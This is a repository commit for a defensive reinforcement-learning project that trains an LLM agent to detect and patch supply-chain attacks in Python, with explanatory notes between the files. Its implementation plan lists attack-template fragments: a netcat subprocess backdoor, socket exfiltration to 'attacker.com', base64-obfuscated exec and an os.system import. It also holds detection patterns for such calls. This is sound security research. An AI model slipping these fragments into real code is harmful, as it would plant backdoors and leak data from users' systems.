Spaces: Ramkan7/Patch_Hawk

RAMCr7 committed on Apr 4

Commit

91f7972

1 Parent(s): 9a00117

added inital

Files changed (48)

README.md +118 -1
config.yaml +28 -0
docker/Dockerfile.sandbox +5 -0
docs/implementation +277 -0
requirements.txt +15 -0
sentinel_synth/__init__.py +0 -0
sentinel_synth/config.py +80 -0
sentinel_synth/dashboard/__init__.py +0 -0
sentinel_synth/dashboard/app.py +169 -0
sentinel_synth/data/__init__.py +0 -0
sentinel_synth/data/benign/ds_binarysearch.py +13 -0
sentinel_synth/data/benign/ds_linkedlist.py +19 -0
sentinel_synth/data/benign/ds_queue.py +15 -0
sentinel_synth/data/benign/ds_sorting.py +8 -0
sentinel_synth/data/benign/ds_stack.py +15 -0
sentinel_synth/data/benign/io_config.py +15 -0
sentinel_synth/data/benign/io_csv.py +11 -0
sentinel_synth/data/benign/io_json.py +5 -0
sentinel_synth/data/benign/io_log.py +8 -0
sentinel_synth/data/benign/io_template.py +6 -0
sentinel_synth/data/benign/math_factorial.py +5 -0
sentinel_synth/data/benign/math_fibonacci.py +7 -0
sentinel_synth/data/benign/math_gcd.py +5 -0
sentinel_synth/data/benign/math_matrix.py +3 -0
sentinel_synth/data/benign/math_prime.py +8 -0
sentinel_synth/data/benign/misc_calc.py +13 -0
sentinel_synth/data/benign/misc_date.py +3 -0
sentinel_synth/data/benign/misc_password.py +8 -0
sentinel_synth/data/benign/misc_temp.py +7 -0
sentinel_synth/data/benign/misc_url.py +11 -0
sentinel_synth/data/benign/str_anagram.py +3 -0
sentinel_synth/data/benign/str_caesar.py +10 -0
sentinel_synth/data/benign/str_palindrome.py +4 -0
sentinel_synth/data/benign/str_slug.py +6 -0
sentinel_synth/data/benign/str_wordcount.py +7 -0
sentinel_synth/data/generate_scenarios.py +253 -0
sentinel_synth/data/scenarios.json +402 -0
sentinel_synth/data/sdk_config.yaml +33 -0
sentinel_synth/envs/__init__.py +0 -0
sentinel_synth/envs/sentinel_env.py +175 -0
sentinel_synth/tests/__init__.py +0 -0
sentinel_synth/tests/test_validator.py +57 -0
sentinel_synth/training/__init__.py +0 -0
sentinel_synth/training/train_grpo.py +187 -0
sentinel_synth/validation/__init__.py +0 -0
sentinel_synth/validation/docker_runner.py +107 -0
sentinel_synth/validation/patch_validator.py +87 -0
setup.py +15 -0

README.md CHANGED Viewed

	@@ -1 +1,118 @@
1	- # ~~PatchHawk~~

+# 🦅 Sentinel-Synth: Autonomous Supply-Chain Guard
+**Sentinel-Synth** is an advanced Reinforcement Learning (RL) platform designed for the detection, analysis, and automated patching of software supply-chain vulnerabilities. It leverages **Group Relative Policy Optimization (GRPO)** and **Meta's Synthetic Data Kit** to train fine-tuned LLM agents that can secure CI/CD pipelines autonomously.
+---
+## 🏗 System Architecture
+The Sentinel-Synth ecosystem is built on four functional pillars:
+```mermaid
+graph TD
+    A[Meta SDK / Mutation Engine] -->|Synthetic Scenarios| B[Scenarios JSON]
+    B --> C[Gymnasium RL Environment]
+    C -->|Observations| D["GRPO Policy Agent (Qwen2.5-Coder)"]
+    D -->|Actions| C
+    C -->|Validation| E[Docker Sandbox & Patch Validator]
+    E -->|Reward Signal| D
+    D -->|Metrics| F[W&B / Dashboard]
+```
+### Core Components
+- **`sentinel_synth.data`**: Orchestrates scenario synthesis using Meta's `synthetic-data-kit` (Track A) and a custom mutation engine (Track B).
+- **`sentinel_synth.envs`**: A `gymnasium` environment that formalizes DevSecOps tasks into an RL problem.
+- **`sentinel_synth.validation`**: A two-tier execution engine (`docker_runner` and `patch_validator`) that uses isolated Docker containers for syntax checking, unit testing, and re-attack verification.
+- **`sentinel_synth.training`**: The training loop using `trl` and `unsloth` for efficient GRPO fine-tuning.
+---
+## 🚀 Getting Started
+### 1. Prerequisites
+- **Python 3.10+** (3.11 recommended)
+- **Docker** (Ensure your user has permission to manage containers)
+- **vLLM Server** (Optional, for Track A synthetic data generation)
+- **GPU** (NVIDIA/AMD) for standard training; CPU supported for dry-runs.
+### 2. Installation
+```bash
+# Set up a virtual environment (recommended)
+python3 -m venv venv
+source venv/bin/activate
+# Install the base system
+pip install -r requirements.txt
+pip install -e .
+# Build the sandbox Docker image
+docker build -t sentinel-sandbox:latest -f docker/Dockerfile.sandbox .
+```
+### 3. Configuration
+Copy the sample environment file and adjust your settings:
+```bash
+cp .env.example .env  # Define model paths, W&B keys, etc.
+```
+Edit `config.yaml` to tune training hyperparameters and environment thresholds.
+---
+## 🧪 Detailed Workflow
+### 📤 Phase 1: Data Generation & Analysis
+Sentinel-Synth generates diverse training scenarios including Typosquatting, Obfuscated Exec, and Subprocess Backdoors.
+**Using Meta's Synthetic Data Kit (Track A):**
+1. Ensure a vLLM server is running.
+2. Configure `sentinel_synth/data/sdk_config.yaml`.
+3. Run the generator:
+```bash
+python3 -m sentinel_synth.data.generate_scenarios --use-sdk --output sentinel_synth/data/scenarios.json
+```
+**Using the Mutation Engine (Track B):**
+This mode takes benign code and injects malicious patterns deterministically.
+```bash
+python3 -m sentinel_synth.data.generate_scenarios --output sentinel_synth/data/scenarios.json
+```
+---
+### 🧠 Phase 2: Agent Training (GRPO)
+Train the `Qwen2.5-Coder-7B` model with Group Relative Policy Optimization (GRPO). GRPO scores each sampled completion relative to the other completions in its group, so the agent can learn without a separate value model.
+**Dry-Run (Pipeline Validation):**
+Validate the pipeline on CPU; no GPU is required:
+```bash
+python3 -m sentinel_synth.training.train_grpo --dry-run
+```
+**Full Training:**
+```bash
+# Ensure WANDB is logged in or API key is in .env
+python3 -m sentinel_synth.training.train_grpo --use-docker
+```
+*Reward signals: correct detection (+1.5), successful patching (+4.0), and a penalty for false positives (-2.0).*
+---
+### 🛡 Phase 3: Validation & Sandbox Execution
+Every patch proposed by the agent is autonomously validated in a secure Docker sandbox:
+1. **Syntax Check**: Ensuring the code is parseable.
+2. **Functional Test**: Running unit tests from `scenarios.json`.
+3. **Re-Attack Verification**: The system re-executes the vulnerability payload to verify the patch actually neutralized the threat (e.g., checking if suspicious file writes or network calls stopped).
+---
+## 📊 Monitoring & UI
+- **Weights & Biases**: Real-time tracking of mean rewards, action distributions, and loss curves.
+- **Streamlit Dashboard**: A professional interface for interactive analysis:
+```bash
+streamlit run sentinel_synth/dashboard/app.py
+```
+---
+## 📄 License
+Sentinel-Synth is licensed under the Apache 2.0 License. See the LICENSE file for details.
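
Note on the README's Phase 2 description: the claim that GRPO needs no value model follows from how it derives advantages. The sketch below shows the commonly described group-relative normalization, where each reward is compared with the mean and standard deviation of its own group. It is illustrative only: `group_relative_advantages` is a hypothetical helper, the sample rewards simply reuse the values quoted in the README, and the actual training script delegates this step to `trl`.

```python
from statistics import mean, pstdev


def group_relative_advantages(rewards, eps=1e-8):
    """Normalize each reward against the mean and std of its own group.

    Hypothetical helper for illustration; not taken from train_grpo.py.
    """
    mu = mean(rewards)
    sigma = pstdev(rewards)
    # eps keeps the division finite when every reward in the group is equal.
    return [(r - mu) / (sigma + eps) for r in rewards]


# One prompt, group_size=4 sampled completions, each scored by the environment.
group_rewards = [4.0, 1.5, -2.0, 1.5]
advantages = group_relative_advantages(group_rewards)
```

Completions that beat the group mean get a positive advantage and the rest get a negative one, so the group itself plays the role of the baseline that a learned value model would otherwise provide.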

config.yaml ADDED Viewed

	@@ -0,0 +1,28 @@

+# ============================================================
+# Sentinel-Synth Training & Pipeline Configuration
+# All tunable hyperparameters live here
+# ============================================================
+data_generation:
+  num_samples: 10
+  output_format: "json"
+  benign_dir: "sentinel_synth/data/benign/"
+  scenarios_output: "sentinel_synth/data/scenarios.json"
+  sdk_config: "sentinel_synth/data/sdk_config.yaml"
+training:
+  learning_rate: 0.000001
+  group_size: 4
+  max_seq_len: 1024
+  max_steps: 100
+  gradient_accumulation_steps: 4
+  ppo_clip_eps: 0.2
+  lora_r: 16
+  lora_alpha: 16
+  lora_dropout: 0
+  output_dir: "grpo_lora"
+environment:
+  max_steps: 5
+  use_docker: false
+  sandbox_timeout_sec: 5
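
Note on `config.yaml`: the learning rate is written as `0.000001`, not `1e-6`. That is probably deliberate, since PyYAML's YAML 1.1 float resolver is known to load an exponent literal without a decimal point as a string. The sketch below shows one way the `training` block could be coerced into typed values after loading. `TrainingConfig` and `from_dict` are hypothetical names, and the defaults are copied from the file above.

```python
from dataclasses import dataclass, fields


@dataclass(frozen=True)
class TrainingConfig:
    """Typed view of the `training` block (hypothetical, for illustration)."""
    learning_rate: float = 1e-6
    group_size: int = 4
    max_seq_len: int = 1024
    max_steps: int = 100
    gradient_accumulation_steps: int = 4
    ppo_clip_eps: float = 0.2
    lora_r: int = 16
    lora_alpha: int = 16
    lora_dropout: float = 0.0
    output_dir: str = "grpo_lora"

    @classmethod
    def from_dict(cls, raw):
        # Use each default's type as the coercion target for that key.
        casts = {f.name: type(f.default) for f in fields(cls)}
        unknown = set(raw) - set(casts)
        if unknown:
            raise KeyError(f"unknown training keys: {sorted(unknown)}")
        # float("1e-6") recovers a number even if the loader produced a string.
        return cls(**{key: casts[key](value) for key, value in raw.items()})
```

With this in place, `TrainingConfig.from_dict(CFG["training"])` would fail fast on a misspelled key instead of silently ignoring it.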

docker/Dockerfile.sandbox ADDED Viewed

	@@ -0,0 +1,5 @@

+FROM python:3.11-slim
+RUN useradd -m sandbox
+USER sandbox
+WORKDIR /app
+CMD ["python", "script.py"]
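
Note on `Dockerfile.sandbox`: the image only sets a non-root user and a working directory. The "no network, memory/CPU limits" properties mentioned in the implementation plan have to be applied when the container is started. The sketch below builds a `docker run` command line with those limits. It is an assumption-laden illustration: `build_sandbox_cmd` is a hypothetical helper, the limit values are arbitrary, and the plan says the real `docker_runner.py` uses the `docker` Python SDK instead of the CLI.

```python
def build_sandbox_cmd(script_path, image="sentinel-sandbox:latest",
                      memory="128m", cpus="0.5"):
    """Return an argv list for running one script in a locked-down container.

    Hypothetical helper; limit values are placeholders, not project settings.
    script_path should be absolute, since it is used in a bind mount.
    """
    return [
        "docker", "run", "--rm",
        "--network", "none",      # no network access from inside the sandbox
        "--memory", memory,       # hard memory cap
        "--cpus", cpus,           # CPU quota
        "--pids-limit", "64",     # guard against fork bombs
        "--read-only",            # root filesystem is read-only
        "-v", f"{script_path}:/app/script.py:ro",
        image,
    ]


cmd = build_sandbox_cmd("/tmp/candidate.py")
```

The resulting list can be passed to `subprocess.run(cmd, capture_output=True, text=True, timeout=5)`, where the timeout would mirror `sandbox_timeout_sec` from `config.yaml`.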

docs/implementation ADDED Viewed

	@@ -0,0 +1,277 @@

+# Sentinel-Synth Phase 1 — Implementation Plan
+## Goal
+Build the complete Sentinel-Synth system: an RL-based supply-chain attack detection platform with synthetic data generation, a Gymnasium environment, Docker-sandboxed validation, GRPO training (Unsloth + W&B), and a Streamlit dashboard.
+## Project Structure
+```
+PatchHawk/
+├── sentinel_synth/
+│   ├── __init__.py
+│   ├── envs/
+│   │   ├── __init__.py
+│   │   └── sentinel_env.py          # Gymnasium RL environment
+│   ├── data/
+│   │   ├── __init__.py
+│   │   ├── generate_scenarios.py    # Synthetic data pipeline
+│   │   ├── benign/                  # 25 benign Python files
+│   │   └── scenarios.json           # Generated dataset (output)
+│   ├── validation/
+│   │   ├── __init__.py
+│   │   ├── docker_runner.py         # Docker sandbox execution
+│   │   └── patch_validator.py       # 3-step patch validation
+│   ├── training/
+│   │   ├── __init__.py
+│   │   └── train_grpo.py            # GRPO + Unsloth + W&B training
+│   ├── dashboard/
+│   │   └── app.py                   # Streamlit demo UI
+│   └── tests/
+│       ├── __init__.py
+│       └── test_validator.py        # Unit tests for validator
+├── docker/
+│   └── Dockerfile.sandbox           # Lightweight Python sandbox
+├── requirements.txt
+├── setup.py
+└── README.md
+```
+---
+## Proposed Changes
+### Component 1: Benign Code Corpus (`sentinel_synth/data/benign/`)
+#### [NEW] 25 benign Python files
+Create 25 small, self-contained Python files that serve as the benign corpus for mutation. Categories:
+- **Math utilities** (5): fibonacci, factorial, prime check, gcd, matrix ops
+- **String utilities** (5): palindrome, anagram, caesar cipher, word count, slug generator
+- **Data structures** (5): stack, queue, linked list, binary search, sorting
+- **File/IO utilities** (5): CSV parser, JSON formatter, config reader, log parser, template engine
+- **Misc** (5): temperature converter, password validator, date formatter, calculator, URL parser
+Each file exports a main function with docstring and is testable with simple assertions.
+---
+### Component 2: Synthetic Data Generator (`sentinel_synth/data/generate_scenarios.py`)
+#### [NEW] [generate_scenarios.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/data/generate_scenarios.py)
+**Key design decisions:**
+- **Track A (Meta synthetic-data-kit)**: Will be implemented as a pluggable module. Since it requires a running vLLM server with Llama 3 8B, the generator will have a `--use-sdk` flag. When disabled, it generates SDK-style examples from hardcoded templates (for offline/demo use).
+- **Track B (Mutation engine)**: Deterministic mutation of benign files using 8 attack templates.
+- Output: `scenarios.json` with 50+ entries.
+**Attack templates (8):**
+1. Typosquatting import (`import pythonn`)
+2. Obfuscated exec (`exec(base64.b64decode(...))`)
+3. Environment variable hijack (`os.environ['PATH'] = '/tmp'`)
+4. Subprocess backdoor (`subprocess.call(['nc', ...])`)
+5. Pickle deserialization (`pickle.loads(untrusted)`)
+6. Hidden eval in decorator (`eval(user_input)`)
+7. Socket exfiltration (`socket.connect(('attacker.com', 80))`)
+8. Malicious `__import__` (`__import__('os').system('...')`)
+**Scenario JSON schema:**
+```json
+{
+  "id": "tp_001",
+  "type": "true_positive|false_positive|functional",
+  "code_snippet": "...",
+  "patch": "...|null",
+  "unit_test_code": "...|null",
+  "label": "malicious|benign",
+  "source": "mutation_engine|synthetic_data_kit|manual",
+  "attack_type": "typosquatting|obfuscated_exec|...|null"
+}
+```
+---
+### Component 3: Docker Sandbox (`docker/Dockerfile.sandbox` + `sentinel_synth/validation/docker_runner.py`)
+#### [NEW] [Dockerfile.sandbox](file:///home/ram/Ram/repos/PatchHawk/docker/Dockerfile.sandbox)
+Minimal Python 3.11-slim image with non-root user, no network, memory/CPU limits.
+#### [NEW] [docker_runner.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/validation/docker_runner.py)
+- `run_in_docker(code, timeout_sec=5)` → `{"stdout", "stderr", "exit_code", "network_blocked", "file_writes"}`
+- Uses `docker` Python SDK for container management
+- Automatic temp directory cleanup
+- Graceful container kill on timeout
+---
+### Component 4: Patch Validator (`sentinel_synth/validation/patch_validator.py`)
+#### [NEW] [patch_validator.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/validation/patch_validator.py)
+Three-step validation pipeline:
+1. **Syntax check**: `py_compile` in Docker
+2. **Unit test execution**: Run scenario's `unit_test_code` against patched code in Docker
+3. **Re-attack verification**: Confirm vulnerability is neutralized by comparing original vs. patched execution telemetry
+Returns `(bool, str, dict)` — (passed, message, details).
+---
+### Component 5: Gymnasium Environment (`sentinel_synth/envs/sentinel_env.py`)
+#### [NEW] [sentinel_env.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/envs/sentinel_env.py)
+- Inherits `gymnasium.Env`
+- **Observation space**: `Dict` with `code_snippet` (Text), `static_flags` (Box[5]), `risk_score` (Box[1])
+- **Action space**: `Discrete(5)` — ANALYZE, EXECUTE_SANDBOX, BLOCK_PR, SUBMIT_PATCH, REQUEST_REVIEW
+- `max_steps = 5`
+- `reset()`: Random scenario selection, compute static flags + risk score
+- `step(action)`: Full reward logic per spec (BLOCK=+2/-1, PATCH=+3/-1.5/-1, etc.)
+- Integrates `docker_runner` and `patch_validator`
+---
+### Component 6: GRPO Training (`sentinel_synth/training/train_grpo.py`)
+#### [NEW] [train_grpo.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/training/train_grpo.py)
+- Load `Qwen2.5-Coder-7B` via Unsloth in 4-bit with LoRA
+- Custom reward function that runs full environment trajectory
+- `GRPOTrainer` from `trl` with group_size=4
+- **W&B integration**: Log per-epoch metrics (mean reward, action distribution, patch success rate, loss)
+- Hyperparameters: `lr=1e-6`, `group_size=4`, `ppo_clip_eps=0.2`, `max_seq_length=1024`
+- Output: LoRA adapter to `./grpo_lora/`
+> [!IMPORTANT]
+> The training script requires GPU access (MI300X target) and a significant amount of VRAM for even the 4-bit model. During development, we'll include a `--dry-run` mode that validates the pipeline without actually training.
+---
+### Component 7: Streamlit Dashboard (`sentinel_synth/dashboard/app.py`)
+#### [NEW] [app.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/dashboard/app.py)
+- Code input text area
+- "Analyze" button triggers environment run
+- Display panels: Agent decision, Patch code, Validation result, Docker telemetry
+- Demo mode with pre-loaded examples (1 malicious, 1 benign)
+- Dark-themed UI with Cobalt Blue accent colors
+- W&B run link display
+---
+### Component 8: Tests (`sentinel_synth/tests/test_validator.py`)
+#### [NEW] [test_validator.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/tests/test_validator.py)
+4 test cases using pytest:
+1. `test_syntax_error_detected` — patch with syntax error → `(False, "Syntax error", ...)`
+2. `test_unit_test_pass` — correct patch → `(True, "Patch is valid", ...)`
+3. `test_unit_test_fail` — broken patch → `(False, "Unit test failed", ...)`
+4. `test_vulnerability_remains` — incomplete patch → `(False, "Vulnerability remains", ...)`
+---
+### Component 9: Project Configuration
+#### [NEW] [requirements.txt](file:///home/ram/Ram/repos/PatchHawk/requirements.txt)
+```
+gymnasium>=0.29.0
+docker>=7.0.0
+streamlit>=1.30.0
+unsloth>=2024.0
+trl>=0.14.0
+transformers>=4.38.0
+torch>=2.1.0
+wandb>=0.16.0
+pytest>=8.0.0
+peft>=0.8.0
+datasets>=2.16.0
+```
+#### [NEW] [setup.py](file:///home/ram/Ram/repos/PatchHawk/setup.py)
+Standard setuptools configuration registering `sentinel_synth` as a package.
+#### [MODIFY] [README.md](file:///home/ram/Ram/repos/PatchHawk/README.md)
+Full project documentation with architecture diagram, setup instructions, usage guide, and data flow.
+---
+## User Review Required
+> [!IMPORTANT]
+> **vLLM / Llama 3 dependency**: Track A of the data generator requires a running vLLM server with Llama 3 8B. Should I:
+> - (A) Implement it with a fallback to template-based generation when the server is unavailable?
+> - (B) Skip Track A entirely for Phase 1 and use only the mutation engine (Track B) + manual templates?
+> [!IMPORTANT]
+> **Docker requirement**: The sandbox and validator require Docker to be installed and the current user to have Docker permissions. Should I add a `--no-docker` mode that simulates sandbox execution for development/testing without Docker?
+> [!WARNING]
+> **W&B API key**: The training script needs a W&B API key. I'll use `wandb.login()` which reads from `WANDB_API_KEY` env var or prompts interactively. Is this acceptable?
+---
+## Open Questions
+1. **GPU availability**: Is the MI300X available now for testing the training script, or should I focus on making the pipeline work with `--dry-run` first?
+2. **Benign corpus**: Should I create the 25 benign Python files from scratch (my plan), or do you have an existing corpus to use?
+3. **synthetic-data-kit version**: Which version of Meta's synthetic-data-kit should I target? The API may have changed.
+---
+## Verification Plan
+### Automated Tests
+```bash
+# 1. Generate scenarios
+python -m sentinel_synth.data.generate_scenarios --output sentinel_synth/data/scenarios.json
+# 2. Validate scenarios.json has 50+ entries
+python -c "import json; d=json.load(open('sentinel_synth/data/scenarios.json')); assert len(d)>=50"
+# 3. Build Docker sandbox image
+docker build -t sentinel-sandbox:latest -f docker/Dockerfile.sandbox .
+# 4. Run unit tests
+pytest sentinel_synth/tests/test_validator.py -v
+# 5. Test environment with gym checker
+python -c "from gymnasium.utils.env_checker import check_env; from sentinel_synth.envs.sentinel_env import SentinelEnv; check_env(SentinelEnv())"
+# 6. Dry-run training
+python -m sentinel_synth.training.train_grpo --dry-run
+# 7. Launch dashboard
+streamlit run sentinel_synth/dashboard/app.py
+```
+### Manual Verification
+- Verify Docker containers are properly isolated (no network, memory limits)
+- Verify W&B dashboard shows training metrics
+- Verify Streamlit dashboard renders correctly with demo examples
+---
+## Execution Order
+```mermaid
+graph TD
+    A[1. Project scaffolding + requirements] --> B[2. Benign corpus - 25 files]
+    B --> C[3. Data generator + scenarios.json]
+    A --> D[4. Dockerfile.sandbox]
+    D --> E[5. docker_runner.py]
+    E --> F[6. patch_validator.py]
+    C --> G[7. sentinel_env.py]
+    F --> G
+    G --> H[8. train_grpo.py + W&B]
+    F --> I[9. test_validator.py]
+    H --> J[10. Streamlit dashboard]
+    G --> J
+    J --> K[11. README.md]
+```
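
Note on Component 4 of the plan: the three-step pipeline and its `(passed, message, details)` return shape can be sketched without Docker. The version below is a simplified, in-process stand-in and not the project's `patch_validator.py`. It uses `compile()` for the syntax check, runs the unit test with `exec`, and replaces the telemetry-based re-attack step with a static pattern scan. The pattern list and the name `validate_patch` are assumptions. Because it calls `exec`, it should only ever be fed trusted code; the plan runs these steps inside the sandbox for that reason.

```python
import re

# Assumed indicator patterns, loosely based on the plan's attack templates.
SUSPICIOUS = [r"\bexec\(", r"\beval\(", r"pickle\.loads\(",
              r"subprocess\.", r"socket\.", r"__import__\("]


def validate_patch(patched_code, unit_test_code=None):
    """Return (passed, message, details) for a candidate patch."""
    # Step 1: syntax check.
    try:
        compile(patched_code, "<patch>", "exec")
    except SyntaxError as exc:
        return False, "Syntax error", {"error": str(exc)}

    # Step 2: run the scenario's unit test against the patched code.
    if unit_test_code:
        namespace = {}
        try:
            exec(patched_code, namespace)
            exec(unit_test_code, namespace)
        except Exception as exc:
            return False, "Unit test failed", {"error": repr(exc)}

    # Step 3: static stand-in for re-attack verification.
    hits = [p for p in SUSPICIOUS if re.search(p, patched_code)]
    if hits:
        return False, "Vulnerability remains", {"patterns": hits}
    return True, "Patch is valid", {}
```

The four messages match the ones that the planned `test_validator.py` cases expect, so the same sketch could serve as a `--no-docker` fallback during development.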

requirements.txt ADDED Viewed

	@@ -0,0 +1,15 @@

+gymnasium>=0.29.0
+docker>=7.0.0
+streamlit>=1.30.0
+unsloth>=2024.0
+trl>=0.14.0
+transformers>=4.38.0
+torch>=2.1.0
+wandb>=0.16.0
+pytest>=8.0.0
+peft>=0.8.0
+datasets>=2.16.0
+python-dotenv>=1.0.0
+PyYAML>=6.0
+synthetic-data-kit>=0.1.0
+vllm-python-client>=0.1.0

sentinel_synth/__init__.py ADDED Viewed

File without changes

sentinel_synth/config.py ADDED Viewed

	@@ -0,0 +1,80 @@

+"""
+Centralized configuration loader for Sentinel-Synth.
+Loads:
+  - .env  → ENV dict (model names, API keys, secrets)
+  - config.yaml → CFG dict (training hyperparameters, paths)
+Usage:
+    from sentinel_synth.config import ENV, CFG
+"""
+import os
+import yaml
+from pathlib import Path
+# ---------- .env loading (no external dependency) ----------
+def _load_dotenv(path: str):
+    """Minimal .env parser — avoids requiring python-dotenv at import time."""
+    env = {}
+    if not os.path.exists(path):
+        return env
+    with open(path) as f:
+        for line in f:
+            line = line.strip()
+            if not line or line.startswith("#"):
+                continue
+            if "=" in line:
+                key, _, value = line.partition("=")
+                key = key.strip()
+                value = value.strip()
+                env[key] = value
+                # Also set in os.environ so downstream libs (wandb) pick it up
+                if value:
+                    os.environ.setdefault(key, value)
+    return env
+# Resolve project root (two levels up from this file)
+_PROJECT_ROOT = Path(__file__).resolve().parent.parent
+_dotenv_raw = _load_dotenv(str(_PROJECT_ROOT / ".env"))
+ENV = {
+    "SYNTH_GENERATOR_MODEL": os.getenv("SYNTH_GENERATOR_MODEL", _dotenv_raw.get("SYNTH_GENERATOR_MODEL", "meta-llama/Llama-3.2-3B-Instruct")),
+    "GRPO_POLICY_MODEL":     os.getenv("GRPO_POLICY_MODEL",     _dotenv_raw.get("GRPO_POLICY_MODEL", "unsloth/Qwen2.5-Coder-7B-Instruct")),
+    "WANDB_API_KEY":         os.getenv("WANDB_API_KEY",         _dotenv_raw.get("WANDB_API_KEY", "")),
+    "WANDB_PROJECT":         os.getenv("WANDB_PROJECT",         _dotenv_raw.get("WANDB_PROJECT", "sentinel-synth")),
+    "WANDB_RUN_NAME":        os.getenv("WANDB_RUN_NAME",        _dotenv_raw.get("WANDB_RUN_NAME", "grpo-qwen-coder-7b")),
+}
+# ---------- config.yaml loading ----------
+_config_path = _PROJECT_ROOT / "config.yaml"
+if _config_path.exists():
+    with open(_config_path) as f:
+        CFG = yaml.safe_load(f)
+else:
+    CFG = {
+        "data_generation": {
+            "num_samples": 10,
+            "output_format": "json",
+            "benign_dir": "sentinel_synth/data/benign/",
+            "scenarios_output": "sentinel_synth/data/scenarios.json",
+            "sdk_config": "sentinel_synth/data/sdk_config.yaml",
+        },
+        "training": {
+            "learning_rate": 1e-6,
+            "group_size": 4,
+            "max_seq_len": 1024,
+            "max_steps": 100,
+            "gradient_accumulation_steps": 4,
+            "ppo_clip_eps": 0.2,
+            "lora_r": 16,
+            "lora_alpha": 16,
+            "lora_dropout": 0,
+            "output_dir": "grpo_lora",
+        },
+        "environment": {
+            "max_steps": 5,
+            "use_docker": False,
+            "sandbox_timeout_sec": 5,
+        },
+    }
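
Note on `_load_dotenv`: the minimal parser stores values exactly as written, so a line such as `WANDB_API_KEY="abc"` would keep its quotes. The sketch below shows one possible extension that strips a single pair of matching quotes and tolerates an `export ` prefix. `parse_dotenv` is a hypothetical name, and it works on a string instead of a file path to keep the example self-contained.

```python
def parse_dotenv(text):
    """Parse KEY=VALUE lines, ignoring blanks and # comments (illustrative)."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        if line.startswith("export "):
            line = line[len("export "):]
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        # Drop one pair of matching surrounding quotes, if present.
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        env[key] = value
    return env
```

The precedence used by `ENV` would stay the same: a variable already set in the process environment wins over the `.env` value, which wins over the hardcoded default.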

sentinel_synth/dashboard/__init__.py ADDED Viewed

File without changes

sentinel_synth/dashboard/app.py ADDED Viewed

	@@ -0,0 +1,169 @@

+import streamlit as st
+import json
+import time
+from sentinel_synth.envs.sentinel_env import SentinelEnv
+st.set_page_config(
+    page_title="Sentinel-Synth Dashboard",
+    page_icon="🛡️",
+    layout="wide",
+    initial_sidebar_state="expanded",
+)
+# Custom CSS for Cobalt Blue theming and dark mode
+st.markdown("""
+<style>
+    :root {
+        --cobalt-blue: #0047AB;
+        --cobalt-light: #2A6DC9;
+        --cobalt-dark: #002255;
+    }
+    .stApp {
+        background-color: #0d1117;
+        color: #c9d1d9;
+    }
+    .css-1d391kg {
+        background-color: #161b22;
+    }
+    /* Headers */
+    h1, h2, h3 {
+        color: #58a6ff !important;
+    }
+    /* Sidebar */
+    .css-1lcbmhc {
+        background-color: #161b22;
+    }
+    /* Buttons */
+    .stButton>button {
+        background-color: var(--cobalt-blue);
+        color: white;
+        border: none;
+        border-radius: 4px;
+        transition: 0.3s;
+    }
+    .stButton>button:hover {
+        background-color: var(--cobalt-light);
+        border: none;
+        color: white;
+    }
+    /* Info box */
+    .info-box {
+        background-color: #1c2128;
+        border-left: 4px solid var(--cobalt-blue);
+        padding: 1rem;
+        border-radius: 0.25rem;
+        margin-bottom: 1rem;
+    }
+    .status-malicious { color: #ff7b72; font-weight: bold; }
+    .status-benign { color: #3fb950; font-weight: bold; }
+    .status-patched { color: #79c0ff; font-weight: bold; }
+</style>
+""", unsafe_allow_html=True)
+@st.cache_resource
+def get_env():
+    return SentinelEnv(use_docker=False)
+def main():
+    st.title("🛡️ Sentinel-Synth | GRPO DevSecOps Agent")
+    st.markdown("Supply-chain attack detection and auto-patching platform via Reinforcement Learning.")
+    env = get_env()
+    with st.sidebar:
+        st.header("Control Panel")
+        mode = st.radio("Mode", ["Demo Scenarios", "Custom Code"])
+        run_docker = st.checkbox("Use Docker Sandbox", value=False)
+        st.markdown("---")
+        st.markdown("**W&B Run:** [View Logs](https://wandb.ai)")
+        st.markdown("**LLM Adapter:** `grpo_lora_qwen`")
+    env.use_docker = run_docker
+    if mode == "Demo Scenarios":
+        col1, col2 = st.columns([1, 1])
+        with col1:
+            if st.button("Load Malicious Example"):
+                malicious = [s for s in env.scenarios if s["label"] == "malicious"]
+                if malicious:
+                    st.session_state["code"] = malicious[0]["code_snippet"]
+                    st.session_state["scenario"] = malicious[0]
+        with col2:
+            if st.button("Load Benign Example"):
+                benign = [s for s in env.scenarios if s["label"] == "benign"]
+                if benign:
+                    st.session_state["code"] = benign[0]["code_snippet"]
+                    st.session_state["scenario"] = benign[0]
+    code_input = st.text_area("Python Code Snippet", value=st.session_state.get("code", ""), height=300)
+    if st.button("Analyze & Defuse"):
+        if not code_input:
+            st.warning("Please provide code to analyze.")
+            return
+        scenario = st.session_state.get("scenario")
+        if mode == "Custom Code" or not scenario or scenario["code_snippet"] != code_input:
+            scenario = {
+                "id": "custom",
+                "label": "unknown",
+                "type": "custom",
+                "code_snippet": code_input,
+                "patch": None
+            }
+        with st.spinner("Agent computing actions in OpenEnv..."):
+            obs, _ = env.reset(options={"scenario": scenario})
+            # Dummy policy for UI demonstration since we don't load the real adapter here yet
+            time.sleep(1)
+            risk = obs["risk_score"][0]
+            action = env.ACTION_SUBMIT_PATCH if risk > 0.4 and scenario.get("patch") else env.ACTION_ANALYZE
+            # If merely analyzed, let's step once more to see what we do
+            if action == env.ACTION_ANALYZE:
+                obs, reward, done, _, info = env.step(action)
+                action = env.ACTION_BLOCK_PR if risk > 0.6 else env.ACTION_REQUEST_REVIEW
+            obs, reward, done, _, info = env.step(action)
+        st.subheader("Agent Report")
+        c1, c2, c3 = st.columns(3)
+        c1.metric("Component Risk Score", f"{risk:.2f}", delta_color="inverse", delta=f"{risk-0.2:.2f}")
+        action_names = ["ANALYZE", "SANDBOX", "BLOCK", "PATCH", "REVIEW"]
+        c2.metric("Agent Action Taken", action_names[action])
+        c3.metric("Reward Received", f"{reward:+.2f}")
+        # Display tabs for detailed results
+        tab1, tab2, tab3 = st.tabs(["Action Details", "Sandbox Telemetry", "Patch Proposal"])
+        with tab1:
+            if action == env.ACTION_BLOCK_PR:
